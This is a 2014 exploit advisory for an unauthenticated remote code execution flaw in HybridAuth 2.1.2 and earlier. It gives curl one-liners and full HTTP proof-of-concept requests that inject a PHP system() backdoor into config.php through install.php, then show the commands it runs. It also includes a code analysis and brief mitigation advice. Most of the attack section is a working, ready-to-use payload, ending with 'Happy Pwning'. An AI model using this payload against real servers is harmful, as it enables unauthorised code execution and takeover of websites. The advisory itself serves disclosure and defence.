-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # HybridAuth <= 2.1.2 Remote Code Execution # Website : http://hybridauth.sourceforge.net/ # Exploit Author : @u0x (Pichaya Morimoto) # Release date : August 5, 2014 # # Special Thanks to 2600 Thailand group # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ HybridAuth enables developers to easily build social applications that engage website visitors and customers on a social level by implementing social sign-in, social sharing, user profiles, friends lists, activity streams, status updates and more. [+] Exploit ============================================================ The default installation leaves "install.php" in place after setup, and, as the PoC below shows, the installer accepts a POST without any authentication. Every posted value is substituted into the config.php template and the result is written back to disk. strip_tags() is applied to each value, but that only removes HTML/PHP tags; it does not escape the double quote, so a value can break out of the "base_url" string literal and inject arbitrary PHP into config.php. The trailing /* in the payload comments out the remainder of the template (including the placeholders that were not replaced), so the rewritten file still parses and the backdoor runs on the next request to config.php. Mitigation: delete install.php (or block access to it) as soon as installation is complete; on an exposed install, check config.php for unexpected content - in the PoC listing the rewritten file is owned by www-data and carries a fresh modification time. $ curl http://victim/hybridauth/install.php -d 'GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*' $ curl http://victim/hybridauth/config.php -d '0=id;ls -lha' [+] Proof-of-Concept ============================================================ PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 Download : http://sourceforge.net/projects/hybridauth/files/hybridauth-2.1.2.zip/download 1. 
Inject Evil PHP Backdoor POST /hybridauth/install.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 51 GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/* HTTP/1.1 200 OK Date: Mon, 04 Aug 2014 18:53:36 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4.3 Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 2437 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html HybridAuth Installer ... 2. Gaining access to the PHP backdoor POST /hybridauth/config.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 14 0=id;ls%20-lha HTTP/1.1 200 OK Date: Mon, 04 Aug 2014 18:54:56 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4.3 Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 403 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html uid=33(www-data) gid=33(www-data) groups=33(www-data) total 40K drwxrwxr-x 3 longcat longcat 4.0K Feb 15 2013 . drwxr-xr-x 4 longcat www-data 4.0K Aug 5 01:14 .. drwxrwxr-x 5 longcat longcat 4.0K Feb 15 2013 Hybrid - -rw-rw-r-- 1 www-data www-data 2.5K Aug 5 01:53 config.php - -rw-rw-r-- 1 longcat longcat 488 Feb 15 2013 index.php - -rw-rw-r-- 1 longcat longcat 18K Feb 16 2013 install.php [+] Vulnerability Analysis ============================================================ Filename: ./install.php ... 
if( count( $_POST ) ): <-- user controlled input HTTP POST data \/-- Read a template file $CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.tpl" ); foreach( $_POST AS $k => $v ): $v = strip_tags( $v ); $z = "#$k#"; \/-- #POST data's keys# found in template file will be replaced with POST data's values | so we can simply replace these existing values with something fun :) $CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE ); endforeach; ... \/-- upload that replaced template contents into config.php $is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE . "config.php", $CONFIG_TEMPLATE ); ... Filename: ./Hybrid/resources/config.php.tpl ... return array( "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#", <-- #..# will be replaced with arbitrary PHP code ... So this is what injected "config.php" looks like... Filename: ./config.php "".system($_POST[0]));/*", "providers" => array ( // openid providers "OpenID" => array ( "enabled" => #OPENID_ADAPTER_STATUS# ), ... Happy Pwning ;) LongCat -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJT39trAAoJEB2kHapd1XMUvFcP/je2VBLG4wDR1W2HIYCVmFOw 7WCYw+bWwDlf3rJsOJd/gQXIGIdgfGXP5nKE6nbvQ6N5a3ucHgArcjonP4kcMzTi wNgx01wdz0YkuZOoWqMz76VWjhNt+jfLm2rG2ihro8P1wvAX8/UOlOhmWXA0loeV pqoFeXvA5cC3lKQ8qnZiTlNepIDvoCbfo7EDpFWv+lCh23GoZsawdZ4MOg/l/D/Y qfCCGtcyaYC2qQAHTqaim0zLF6jUEto0+Y3+3Lxi3G9JdCYGWGWrX83L5ziVIEJI ANvaJEZF+JMzzS/RHufSMngld9IXGvDv/ZVMgn0ONH3bk2o9I19Nb/HT2DKnRSCh 1pIXWdQwnDuAM8z7ZhDakTusWlR2RiPM6YuPLUnyJHlx4PH2BnLlwVKZlNbcl97A 9qnbrUTmlivJx+Bh6HjU6TS5AN3ETVEngEG/vEkCmbEWvJyMpXppSq6a/gejDNx7 N57fqw+Vz/cWQVk7BaHK9KYQ3SnEJwdDFkCctlv13Ckd2UuOfAi1qwfZ7n6S0JgD oVO64SpYkeodOSJ59YX9vNn/gSYLjayNKINHWhJvtVXanYHrJzZY9Orjzf5pAl3+ WOGYjuf4pPJY2XNjAE4AQ68g2Csl3cqLdbHe1yRVrPmzK1ZMQC/tjcgiB6XZObxe kAPY+EmH3MxZ/qeob16k =10bM -----END PGP SIGNATURE-----